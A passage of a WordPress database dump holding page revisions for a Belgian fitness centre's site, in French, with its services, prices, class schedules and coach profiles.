outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:58:05', '2013-07-03 17:58:05', '', 11, 'http://www.crosstrainingcenter.be/?p=205', 0, 'revision', '', 0);
INSERT INTO `www_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(126, 1, '2013-06-16 14:39:01', '2013-06-16 14:39:01', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n\r\n&nbsp;\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2></h2>\r\n<h2></h2>\r\n<h2>Les cours :</h2>\r\nEn semaine<br>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">&nbsp;</td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:39:01', '2013-06-16 14:39:01', '', 11, 'http://www.crosstrainingcenter.be/?p=126', 0, 'revision', '', 0),
(127, 1, '2013-06-16 14:44:31', '2013-06-16 14:44:31', '<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Prix :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;<br>\r\n&nbsp;<br>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-06-16 14:44:31', '2013-06-16 14:44:31', '', 11, 'http://www.crosstrainingcenter.be/?p=127', 0, 'revision', '', 0),
(128, 1, '2013-05-24 14:36:30', '2013-05-24 14:36:30', 'blabla', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-3', '', '', '2013-05-24 14:36:30', '2013-05-24 14:36:30', '', 20, 'http://www.crosstrainingcenter.be/?p=128', 0, 'revision', '', 0),
(129, 1, '2013-06-16 14:50:56', '2013-06-16 14:50:56', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-4', '', '', '2013-06-16 14:50:56', '2013-06-16 14:50:56', '', 20, 'http://www.crosstrainingcenter.be/?p=129', 0, 'revision', '', 0),
(130, 1, '2013-06-16 14:55:43', '2013-06-16 14:55:43', '', 'rg', '', 'inherit', 'open', 'open', '', 'rg', '', '', '2013-06-16 14:55:43', '2013-06-16 14:55:43', '', 20, 'http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg', 0, 'attachment', 'image/jpeg', 0),
(131, 1, '2013-07-03 20:00:11', '2013-07-03 20:00:11', '<table style=\"border: 1px; width: 100%;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%; height: 290px;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-235 alignleft\" alt=\"julie_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julie_pierrard-pti.jpg\" width=\"97\" height=\"127\" /></td>\n<td style=\"border: 1px; padding: 5px;\">\n<h2>Julie Pierrard</h2>\n<h5>Gérante\nCoatch\nDiététicienne</h5>\n<ul>\n	<li>Baccalauréat en diététique</li>\n	<li>Spécialisation en diététique du sport</li>\n	<li>Enseignante en éducation nutritionnelle</li>\n	<li>Pratiquante de judo, natation et cyclisme</li>\n</ul>\n</td>\n</tr>\n</tbody>\n</table>\n</div></td>\n<td style=\"border: 1px; padding: 5px; width: 50%;\">\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%; height: 290px;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-233 alignleft\" alt=\"damien_pierrard-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/damien_pierrard-pti.jpg\" width=\"108\" height=\"140\" /></td>\n<td style=\"border: 1px; padding: 5px;\">\n<h2>Damien Pierrard</h2>\n<h5>Fondateur Pierrard Sports\nFormateur coach\nCoach</h5>\n<ul>\n	<li>Licence en éducation physique</li>\n	<li>Diplôme universitaire en préparation physique et entrainement des sportifs</li>\n	<li>Maitre assistant à l’IES Parnasse-ISEI</li>\n	<li>Préparateur physique</li>\n	<li>Pratiquant de course à pied, natation et cyclisme</li>\n</ul>\n</td>\n</tr>\n</tbody>\n</table>\n</div></td>\n</tr>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\">\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%; height: 290px;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-234 alignleft\" alt=\"guelor-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/guelor-pti.jpg\" width=\"108\" height=\"141\" /></td>\n<td style=\"border: 1px; padding: 5px;\">\n<h2>Guélor Luabeya</h2>\n<h5>Fondateur GLFE consulting\nFormateur coach\nCoach</h5>\n<ul>\n	<li>Instructeur de cours collectifs LES MILLS, présenteur international et formateur national</li>\n	<li>Premier Trainer National Belge</li>\n	<li>Personal trainer (formation Direct Fitness et Les Mills Coach) expert en kettlelbell, VIPR, Body Boxe et TRX</li>\n	<li>Ancien footballeur semi-professionnel et passionné de sports de combat</li>\n</ul>\n</td>\n</tr>\n</tbody>\n</table>\n</div></td>\n<td style=\"border: 1px; padding: 5px;\">\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%; height: 290px;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-237 alignleft\" alt=\"mathieu_gille-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/mathieu_gille-pti.jpg\" width=\"108\" height=\"140\" /></td>\n<td style=\"border: 1px; padding: 5px;\">\n<h2>Matthieu Gille</h2>\n<h5>Coach</h5>\n<ul>\n	<li>Préparateur physique en sport collectif et individuel</li>\n	<li>Brevet A de l’URBSFA</li>\n	<li>Pratiquant de foot, triathlon, tennis et golf</li>\n</ul>\n</td>\n</tr>\n</tbody>\n</table>\n</div></td>\n</tr>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\">\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%; height: 290px;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-232 alignleft\" alt=\"bertrand_bauwin-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/bertrand_bauwin-pti.jpg\" width=\"108\" height=\"140\" /></td>\n<td style=\"border: 1px; padding: 5px;\">\n<h2>Bertrand Bauwin</h2>\n<h5>Coatch</h5>\n<ul>\n	<li>Baccalauréat en éducation physique</li>\n	<li>Spécialisation en psychomotricité</li>\n	<li>Préparateur physique et entraineur de football diplômé de l’URBSFA</li>\n	<li>Enseignant en éducation physique</li>\n	<li>Pratiquant de foot, triathlon, tennis et VTT</li>\n</ul>\n</td>\n</tr>\n</tbody>\n</table>\n</div></td>\n<td style=\"border: 1px; padding: 5px;\">\n<div class=\"arrondi\">\n<table style=\"border: 1px; width: 100%; height: 290px;\">\n<tbody>\n<tr style=\"background-color: #ffffff;\">\n<td style=\"border: 1px; padding: 5px;\"><img class=\" wp-image-236 alignleft\" alt=\"julien_meulemans-pti\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/07/julien_meulemans-pti.jpg\" width=\"108\" height=\"140\" /></td>\n<td style=\"border: 1px; padding: 5px;\">\n<h2>Julien Meulemans</h2>\n<h5>Coatch</h5>\n<ul>\n	<li>Baccalauréat en éducation physique</li>\n	<li>Maitre psychomotricien</li>\n	<li>Formation de personal trainer</li>\n	<li>Formation en Streching Global Actif (SGA)</li>\n	<li>Formation à l’initiation au golf et snag golf</li>\n	<li>Enseignant en éducation physique</li>\n	<li>Pratiquant de foot et de ski</li>\n</ul>\n</td>\n</tr>\n</tbody>\n</table>\n</div></td>\n</tr>\n</tbody>\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-autosave', '', '', '2013-07-03 20:00:11', '2013-07-03 20:00:11', '', 20, 'http://www.crosstrainingcenter.be/?p=131', 0, 'revision', '', 0),
(132, 1, '2013-06-16 14:55:32', '2013-06-16 14:55:32', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\"><div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-5', '', '', '2013-06-16 14:55:32', '2013-06-16 14:55:32', '', 20, 'http://www.crosstrainingcenter.be/?p=132', 0, 'revision', '', 0),
(136, 1, '2013-06-16 15:00:45', '2013-06-16 15:00:45', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne<br><br><br></div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-9', '', '', '2013-06-16 15:00:45', '2013-06-16 15:00:45', '', 20, 'http://www.crosstrainingcenter.be/?p=136', 0, 'revision', '', 0),
(133, 1, '2013-06-16 14:57:50', '2013-06-16 14:57:50', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<h2 class=\"arrondi\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a>Julie Pierrard</h2>\r\nGérante\r\n\r\nCoatch\r\n\r\nDiététicienne</td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-6', '', '', '2013-06-16 14:57:50', '2013-06-16 14:57:50', '', 20, 'http://www.crosstrainingcenter.be/?p=133', 0, 'revision', '', 0),
(134, 1, '2013-06-16 14:59:12', '2013-06-16 14:59:12', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<h2 class=\"arrondi\"><a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-7', '', '', '2013-06-16 14:59:12', '2013-06-16 14:59:12', '', 20, 'http://www.crosstrainingcenter.be/?p=134', 0, 'revision', '', 0),
(135, 1, '2013-06-16 15:00:22', '2013-06-16 15:00:22', '<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">\r\n<a href=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\"><img class=\"size-full wp-image-130 alignleft\" alt=\"rg\" src=\"http://www.crosstrainingcenter.be/wp-content/uploads/2013/06/rg.jpg\" width=\"132\" height=\"195\" /></a><h2>Julie Pierrard</h2>\r\nGérante\r\nCoatch\r\nDiététicienne</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n<tr style=\"background-color: #ffffff;\">\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n<td style=\"border: 1px; padding: 5px;\">\r\n<div class=\"arrondi\">1</div></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'L\'équipe', '', 'inherit', 'open', 'open', '', '20-revision-8', '', '', '2013-06-16 15:00:22', '2013-06-16 15:00:22', '', 20, 'http://www.crosstrainingcenter.be/?p=135', 0, 'revision', '', 0),
